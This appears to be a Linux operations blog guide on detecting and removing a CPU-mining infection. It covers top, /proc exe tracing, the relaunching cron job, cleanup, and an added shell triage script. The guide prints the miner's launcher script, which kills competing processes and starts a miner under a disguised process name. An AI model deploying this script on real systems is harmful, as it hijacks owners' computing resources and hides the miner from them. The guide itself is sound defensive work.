How to Detect and Remove a Hidden CPU‑Mining Virus on Your Linux Server
This guide walks you through identifying a CPU‑mining malware infection on a Linux server, from spotting abnormal CPU usage with top, tracing the malicious executable, disabling its cron job, and safely cleaning the infected files and processes.
Background
While working on a project, the server became unusually sluggish and the CPU sat constantly at 100% despite no heavy workloads. Investigation revealed that the server was infected by a cryptocurrency mining virus.
Problem Investigation
Run top to find processes with high CPU usage and note their pid.
Determine which file started the process with ls -l /proc/<pid>/exe.
Navigate to the directory shown (e.g., /var/tmp/.cache) and list its contents.
Inspect the run script in that directory. The script kills processes using more than 40% CPU (excluding certain binaries) and then launches hidden mining binaries (h32 or h64) based on the system architecture.
# Example of the malicious script
ps aux | grep -vw 'xmr-stak\|ld-linux.so.2' | (test -e bash.pid && grep -vwf bash.pid) \
| awk '{if($3>40.0) print $2}' | while read procid; do kill -9 $procid; done 2>/dev/null
proc=$(nproc)
ARCH=$(uname -m)
HIDE="-bash"
if [ "$ARCH" == "i686" ]; then
./h32 -s $HIDE ./java >>/dev/null &
elif [ "$ARCH" == "x86_64" ]; then
./h64 -s $HIDE ./java >>/dev/null &
fi
pid=$!
new_pid=$((pid + 1))
echo $new_pid > bash.pid
The script kills high‑CPU processes first to free the CPU for the attacker's own miner, not to help the system.
Problem Handling
After identifying the malicious process (e.g., PID 1234), kill it:
kill -9 1234
If the CPU spikes again, a scheduled cron job is likely restarting the miner. Edit the crontab with crontab -e and remove the line:
* * * * * /var/tmp/.cache/upd >/dev/null 2>&1
Finally, delete the infected directory:
rm -rf /var/tmp/.cache
Summary
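The investigation and handling steps above can be scripted so the check is repeatable. The following triage helper is an added example, not code from the article or from MaGe: it reads "pid cpu exe" lines (the same data top and ls -l /proc/<pid>/exe give you), flags processes above a CPU threshold whose executable lives under a temp or hidden directory, and filters crontab text for lines that reference the infected path. The 40% threshold and the /var/tmp/.cache path come from the article; the function names, the path heuristic and the sample data are assumptions of this example, and the sample lines are constructed, not captured.

```shell
#!/bin/sh
# Added triage helper (example code, not the article's own): finds processes above a
# CPU threshold whose executable lives in a suspicious location, then looks for the
# cron entries that relaunch it. The 40% threshold and /var/tmp/.cache come from the
# article; the heuristic, function names and sample data are this example's assumptions.

# Heuristic: executables under temp/world-writable dirs, inside a hidden
# (dot-prefixed) directory, or already unlinked from disk deserve a second look.
is_suspicious_path() {
    case "$1" in
        /tmp/*|/var/tmp/*|/dev/shm/*) return 0 ;;  # world-writable staging dirs
        */.*/*)                        return 0 ;;  # hidden directory component
        *"(deleted)"*)                 return 0 ;;  # binary removed after launch
    esac
    return 1
}

# Reads "pid cpu exe" lines on stdin and prints those over the threshold
# that also fail the path check. Pure filter, so it can be fed captured data.
triage_lines() {
    threshold="$1"
    while read -r pid cpu exe; do
        [ -n "$pid" ] || continue
        # awk does the float comparison; exit status 0 means "above threshold"
        awk -v c="$cpu" -v t="$threshold" 'BEGIN { exit !(c + 0 > t + 0) }' || continue
        is_suspicious_path "$exe" || continue
        printf '%s %s %s\n' "$pid" "$cpu" "$exe"
    done
}

# Live collector: walks /proc, resolves each exe symlink and asks ps for %CPU.
collect_live() {
    for p in /proc/[0-9]*; do
        pid=${p#/proc/}
        exe=$(readlink "$p/exe" 2>/dev/null) || continue   # kernel threads have no exe
        cpu=$(ps -o %cpu= -p "$pid" 2>/dev/null | tr -d ' ')
        [ -n "$cpu" ] && printf '%s %s %s\n' "$pid" "$cpu" "$exe"
    done
}

# Filters crontab text on stdin down to non-comment lines naming the given path.
cron_lines_referencing() {
    grep -v '^[[:space:]]*#' | grep -F -- "$1"
}

# Gathers every crontab the miner could have been planted in: the system
# crontab, /etc/cron.d, and each user's spool file (root needed for the spool).
all_crontabs() {
    cat /etc/crontab /etc/cron.d/* /var/spool/cron/crontabs/* /var/spool/cron/* 2>/dev/null
}

# Constructed sample of what collect_live would print on the infected box.
SAMPLE_PROCS='1 0.3 /usr/lib/systemd/systemd
1234 97.5 /var/tmp/.cache/h64
2048 55.0 /usr/bin/java
3001 1.2 /usr/sbin/sshd'

# Constructed crontab matching the entry the article found.
SAMPLE_CRON='# m h dom mon dow command
* * * * * /var/tmp/.cache/upd >/dev/null 2>&1
0 3 * * * /usr/local/bin/backup.sh'

if [ "${1:-}" = "live" ]; then
    # Real run: only the miner-like process and its cron line should come out.
    collect_live | triage_lines 40
    all_crontabs | cron_lines_referencing /var/tmp
else
    # Offline demo on the constructed data: prints the h64 process and the upd cron line.
    printf '%s\n' "$SAMPLE_PROCS" | triage_lines 40
    printf '%s\n' "$SAMPLE_CRON" | cron_lines_referencing /var/tmp/.cache
fi
```

Run it as root with the argument live to scan the actual host; without arguments it only exercises the constructed sample. Two points the heuristic reflects: a legitimate binary such as /usr/bin/java at 55% CPU is not flagged, because location matters more than load alone, and crontab -e only edits the invoking user's crontab, so all_crontabs also reads /etc/cron.d and the per-user spool files where a relaunch entry may sit under another account.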
To remediate a CPU‑mining virus on a Linux server: use top to locate the offending process, trace its executable, examine and stop the malicious script, remove any cron jobs that relaunch it, and delete the hidden cache directory.
MaGe Linux Operations